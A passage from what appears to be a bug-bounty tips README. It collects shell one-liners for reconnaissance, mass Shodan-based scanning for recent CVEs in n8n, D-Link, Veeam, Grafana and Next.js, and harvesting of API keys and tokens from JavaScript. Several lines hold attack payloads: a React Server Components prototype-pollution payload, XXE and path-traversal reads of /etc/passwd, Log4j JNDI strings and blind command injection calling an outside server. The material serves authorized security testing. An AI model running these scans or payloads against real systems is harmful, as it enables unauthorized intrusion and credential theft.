    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

ð New Oneliners 2026

â¡ð¥â¡ Ni8mare - CVE-2026-21858 (CVSS 10.0 - CRITICAL) â¡ð¥â¡

ð Critical Unauthenticated RCE in n8n Workflow Automation - 100,000+ servers affected! Added to CISA KEV ð

â¡ Detect n8n Instances (Shodan/Censys)

shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt

â¡ Fingerprint n8n Installations

cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt

â¡ Check Vulnerable Webhook Endpoints

cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt

â¡ Content-Type Confusion Detection

curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"

â¡ Mass n8n Version Detection

cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+\.[0-9]+\.[0-9]+"' | anew n8n_versions.txt

â¡ Nuclei Template Check for CVE-2026-21858

nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt

â ï¸ Affected: n8n < 1.121.0 | â Fix: Update to n8n 1.121.0+

â¡ð¥â¡ N8n Auth RCE - CVE-2026-21877 (CVSS 10.0 - CRITICAL) â¡ð¥â¡

ð Authenticated RCE via Git Node in n8n - Cloud & Self-hosted affected! ð

â¡ Detect Git Node Enabled Instances

cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt

â¡ Check n8n Authentication Endpoints

cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt

â ï¸ Affected: n8n < 1.121.3 | â Fix: Update to n8n 1.121.3+

â¡ð¥â¡ D-Link DSL RCE - CVE-2026-0625 (CVSS 9.3 - CRITICAL) â¡ð¥â¡

ð Command Injection in Legacy D-Link DSL Routers - Under active exploitation! ð

â¡ Shodan Dork for D-Link DSL Routers

shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt

â¡ Detect Vulnerable dnscfg.cgi Endpoint

cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt

â¡ Mass D-Link Fingerprint

cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt

â ï¸ Affected: Legacy D-Link DSL Gateway Routers (EOL) | â Fix: Replace with supported devices

â¡ð¥â¡ Veeam Backup RCE - CVE-2025-59470 (CVSS 9.0 - CRITICAL) â¡ð¥â¡

ð RCE via Postgres Parameter Injection in Veeam Backup & Replication ð

â¡ Detect Veeam Backup Servers

shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txt

â¡ Fingerprint Veeam Instances

cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt

â ï¸ Affected: Veeam B&R 13.0.1.180 and earlier | â Fix: Update to 13.0.1.1071+

â¡ð¥â¡ Grafana Ghost XSS - CVE-2025-4123 (HIGH SEVERITY) â¡ð¥â¡

ð Zero-Day XSS in Grafana - 46,500+ instances still vulnerable! Account Takeover possible ð

â¡ Find Grafana Instances

shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt

â¡ Detect Grafana Version

cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+\.[0-9]+\.[0-9]+"' | anew grafana_versions.txt

â¡ Check Open Redirect (CVE-2025-4123 vector)

cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt

â¡ Mass Grafana Login Page Detection

cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt

â ï¸ Affected: Multiple Grafana versions | â Fix: Update to latest patched version

â¡ð¥â¡ CVE-2026 Subdomain Hunting - Mass Detection Pipeline â¡ð¥â¡

ð 10 Oneliners to hunt CVE-2026 vulnerabilities across subdomains at scale! ð

â¡ 1. Full Subdomain CVE-2026 Hunt Pipeline (n8n + Grafana + D-Link)

subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt

â¡ 2. Mass n8n CVE-2026-21858 Detection on Subdomains

subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent

â¡ 3. CVE-2026-21877 n8n Git Node RCE Subdomain Scanner

cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt

â¡ 4. Grafana CVE-2025-4123 XSS + Open Redirect Subdomain Hunt

subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'

â¡ 5. Multi-CVE-2026 Scanner with Nuclei (Parallel Templates)

subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt

â¡ 6. Subdomain n8n Webhook Fingerprint + CVE-2026-21858 Check

cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt

â¡ 7. CVE-2026 IoT/Router Hunt (D-Link DSL + Other Routers)

subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'

â¡ 8. Veeam CVE-2025-59470 Subdomain Detection

subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13\.0\.[01]\.[0-9]+" && echo "[CVE-2025-59470 VULN] @"'

â¡ 9. Combined CVE-2026 Fingerprint + Version Extractor

subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt

â¡ 10. Full CVE-2026 Recon Automation Script

domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"

ð¯ Pro Tip: Combine with notify to get real-time alerts: ... | notify -silent -provider slack

â¡ð¥â¡ Advanced Reconnaissance Pipeline - 2026 Edition â¡ð¥â¡

ð¯ 10 Elite Oneliners for comprehensive reconnaissance - Multi-source enumeration, ASN discovery, JS analysis & more! ð¯

â¡ 1. Multi-Source Subdomain Discovery + Tech Fingerprinting

subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt

Combines Subfinder + Assetfinder + Amass for maximum subdomain coverage, then validates with httpx + technology fingerprinting

â¡ 2. ASN Enumeration + Reverse DNS Discovery

echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt

Discovers ASN, enumerates IP blocks, performs reverse DNS to find hidden subdomains

â¡ 3. URL Discovery Pipeline (Wayback + GAU + Katana)

cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt

Parallel URL collection from Wayback Machine, Common Crawl, AlienVault + active crawling with smart deduplication

â¡ 4. JavaScript Deep Analysis + Secret Scanner

cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt

Finds JS files, extracts hardcoded secrets (API keys, tokens, AWS keys) and hidden API endpoints

â¡ 5. Certificate Transparency + Subdomain Permutation Attack

curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt

CT logs enumeration + intelligent permutation (api â api-dev, api-staging) with mass DNS resolution

â¡ 6. Port Discovery + Web Services on Non-Standard Ports

cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt

Fast port scan + discovers web apps running on unusual ports (8080, 8443, 3000, etc)

â¡ 7. GitHub Dorking Automation for Target Organization

ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done

Automated GitHub dorking for secrets, credentials and sensitive data exposure

â¡ 8. Cloud Storage Discovery (S3 + Azure + GCP)

cat all_urls.txt | grep -oE '(s3\.amazonaws\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.s3\.amazonaws\.com|storage\.googleapis\.com/[a-zA-Z0-9._-]+|[a-zA-Z0-9._-]+\.blob\.core\.windows\.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200\|403" && echo "[+] {} - Accessible"'

Extracts and validates misconfigured cloud storage buckets from collected URLs

â¡ 9. Parameter Discovery + Vulnerability Pattern Matching

cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt

Extracts unique parameters and categorizes by vulnerability type (XSS, SSRF, SQLi, Redirect)

â¡ 10. Continuous Recon Monitor (Cron-Ready)

DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt

Full persistent recon pipeline - detects new assets daily and sends notifications

ð¯ Pro Tip: Run oneliner #10 via cron for 24/7 monitoring: 0 */6 * * * /path/to/recon_monitor.sh

â¡ð¥â¡ JavaScript Endpoint Extraction - Elite Techniques 2026 â¡ð¥â¡

ð¯ 10 Oneliners to extract endpoints, secrets and hidden APIs from JavaScript files! ð¯

â¡ 1. Mass JS File Discovery + Download Pipeline

cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'

Discovers all JS files with Katana, filters by size (>500 bytes), downloads for offline analysis

â¡ 2. Extract All API Endpoints from JS Files

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null' | grep -oE '["'"'"'](\/[a-zA-Z0-9_\-\.\/]+(\?[a-zA-Z0-9_\-\.=&]+)?)['"'"'"]' | sed 's/[\"'"'"']//g' | sort -u | grep -E "^/" | grep -vE "\.(css|png|jpg|svg|gif|woff|ico)$" | anew js_endpoints.txt

Extracts all relative API paths from JavaScript, filters static assets

â¡ 3. AWS Keys Hunter in JS Files

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt

Hunts for AWS Access Key IDs (AKIA, ABIA, ACCA, ASIA patterns)

â¡ 4. Google API Keys + Firebase URLs Extractor

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+\.firebaseio\.com|[a-z0-9-]+\.firebaseapp\.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt

Extracts Google API keys and Firebase database/app URLs

â¡ 5. S3 Bucket Discovery in JavaScript

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'

Finds S3 buckets in JS and validates accessibility

â¡ 6. Internal IP Addresses Leakage

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[01])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt

Discovers internal/private IP addresses leaked in JavaScript (10.x, 172.16-31.x, 192.168.x)

â¡ 7. Slack Webhooks + Discord Tokens in JS

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt

Extracts Slack webhook URLs and Discord bot tokens

â¡ 8. GitHub Tokens + Private Keys Detection

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt

Finds GitHub personal access tokens (all formats) and private key headers

â¡ 9. Email Addresses + Hidden Subdomains in JS

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt

Extracts email addresses and hidden subdomains referenced in JavaScript

â¡ 10. Full JS Recon Pipeline (All-in-One)

TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE "\.js(\?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '\"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"

Complete JS recon pipeline: discovers JS files, downloads all, extracts AWS/Google/GitHub keys and API endpoints

ð¯ Pro Tip: Use nuclei -t exposures/tokens/ on discovered secrets to validate if they're active!

ð Oneliners 2024-2025

â¡ð¥â¡ React2Shell - CVE-2025-55182 (CVSS 10.0 - CRITICAL) â¡ð¥â¡

ð Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV ð

â¡ Detect Next.js Apps (Recon First)

cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

â¡ Check if Next-Action Header is Accepted

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

â¡ Mass Detection - Next-Action Header Accepted

cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

â¡ Create Payload Files for Testing

# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

â¡ Manual Vulnerability Check with cURL

curl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

â¡ One-liner: Full Detection Pipeline

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

â¡ Detect Vulnerable Response Headers

cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

â¡ Mass Scan with httpx + Next-Action Probe

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

â¡ Shodan Dork for Next.js Targets

shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

â¡ Nuclei Template Check

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

â¡ Find & Test - Complete One-liner

subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

â¡ Check RSC Endpoint Directly

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

â¡ Batch Test from File with Parallel

cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

â ï¸ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | â Fix: Update to React 19.0.1/19.1.2/19.2.1

ð¯ Key Detection: Apps accepting Next-Action header + RSC deserialization = Potential RCE

Nuclei DAST XSS

echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Mass

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

CORS Misconfiguration

cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt

Host Header Injection

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

CRLF Injection

cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Prototype Pollution

cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt

Cache Poisoning Detection

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

IDOR Pattern Detection

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

Race Condition URLs

cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

WebSocket Endpoints

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

Path Traversal

cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

XXE Detection

cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

Log4j Scan

cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

Blind Command Injection

cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

Mass Screenshot

cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Technology Detection

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

Favicon Hash (Shodan)

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Exposed Admin Panels

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

Debug Endpoints

cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

WordPress Enumeration

cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Laravel Debug Mode

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

Django Debug

cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

HTTP Request Smuggling

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

CSP Bypass Check

cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Subdomain from Favicon

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

ð Search Engines for Hackers

Engine	Link	Description
Shodan	shodan.io	IoT & device search
Censys	censys.io	Internet scan data
Fofa	fofa.info	Cyberspace search
ZoomEye	zoomeye.org	Cyberspace mapping
Hunter	hunter.how	Asset discovery
Netlas	netlas.io	Attack surface
GreyNoise	greynoise.io	Internet scanners
Onyphe	onyphe.io	Cyber defense
CriminalIP	criminalip.io	Threat intel
FullHunt	fullhunt.io	Attack surface
Quake	quake.360.net	Cyberspace search
Leakix	leakix.net	Leak detection
URLScan	urlscan.io	URL analysis
DNSDumpster	dnsdumpster.com	DNS recon
crt.sh	crt.sh	Certificate search
SecurityTrails	securitytrails.com	DNS history
Pulsedive	pulsedive.com	Threat intel
VirusTotal	virustotal.com	File/URL analysis
PublicWWW	publicwww.com	Source code search
Grep.app	grep.app	GitHub code search

ð Recommended Wordlists

Wordlist	Link	Use Case
SecLists	GitHub	Everything
FuzzDB	GitHub	Fuzzing
Assetnote	wordlists.assetnote.io	Web content
OneListForAll	GitHub	Combined
jhaddix all.txt	GitHub	Directories
commonspeak2	GitHub	Real-world

ð Learning Resources

Books

Web Application Hacker's Handbook
Real-World Bug Hunting by Peter Yaworski
Bug Bounty Bootcamp by Vickie Li

Platforms

Practice

Blogs & Resources

ð Special Thanks

Hunter	Hunter	Hunter
@bt0s3c	@MrCl0wnLab	@stokfredrik
@Jhaddix	@TomNomNom	@NahamSec
@zseano	@pry0cc	@pdiscoveryio
@jeff_foley	@haaborern	@0xacb

ð¤ Contributing

We welcome contributions from the community! Your expertise makes this repository better.

ð¡ How to Contribute

ð Click to see contribution guidelines

Fork the Repository

git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git
cd KingOfBugBountyTips

Create a New Branch

git checkout -b feature/your-contribution

Add Your Content
- Add new one-liners with proper documentation
- Include source references and explanations
- Follow the existing format and structure
Submit Pull Request
- Write a clear description of your changes
- Reference any related issues
- Wait for review and feedback

â¨ What to Contribute

ð¯ New bug bounty one-liners and techniques
ð§ Tool installation guides and tips
ð Additional resources and references
ð Bug fixes and improvements
ð Documentation enhancements
ð Translations to other languages

ð Repository Analytics

Stars

Forks

Watchers

Contributors

ð Growth Chart

ð Support the Project

If this repository helped you in your bug bounty journey, consider supporting the project!

â Show Your Support

Give this repository a star if you found it helpful!

ð License & Legal

â ï¸ Important Disclaimer

âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
â                    â ï¸  LEGAL NOTICE â ï¸                        â
â ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ£
â  This repository is for EDUCATIONAL PURPOSES ONLY             â
â                                                                â
â  â DO: Use for authorized security testing                   â
â  â DO: Learn and understand the techniques                   â
â  â DO: Contribute and share knowledge                        â
â                                                                â
â  â DON'T: Use for unauthorized testing                       â
â  â DON'T: Use for malicious purposes                         â
â  â DON'T: Violate laws or regulations                        â
â                                                                â
â  The authors are NOT responsible for any misuse or damage     â
â  caused by this information. Always test responsibly!         â
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ

ð Quick Links & Resources

Resource	Link
ð Homepage	King of Bug Bounty Tips
ð ï¸ KingRecon DOD	Automated Recon Tool
ð§ BugBuntu OS	Download Here
ðº YouTube Channel	OFJAAAH
ð¬ Telegram Group	Join Community
ð¦ Twitter/X	@ofjaaah
ð¼ LinkedIn	Connect
ð Report Issues	GitHub Issues
ð Security Issues	Security Advisory

ð Special Thanks

To all contributors, bug bounty hunters, and the security community who make this project possible!

Last Updated: January 2026 | Version: 4.5

ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
â          "Stay curious, stay ethical, stay hungry" ð´ââ ï¸          â
â                  Happy Hunting! ð                               â
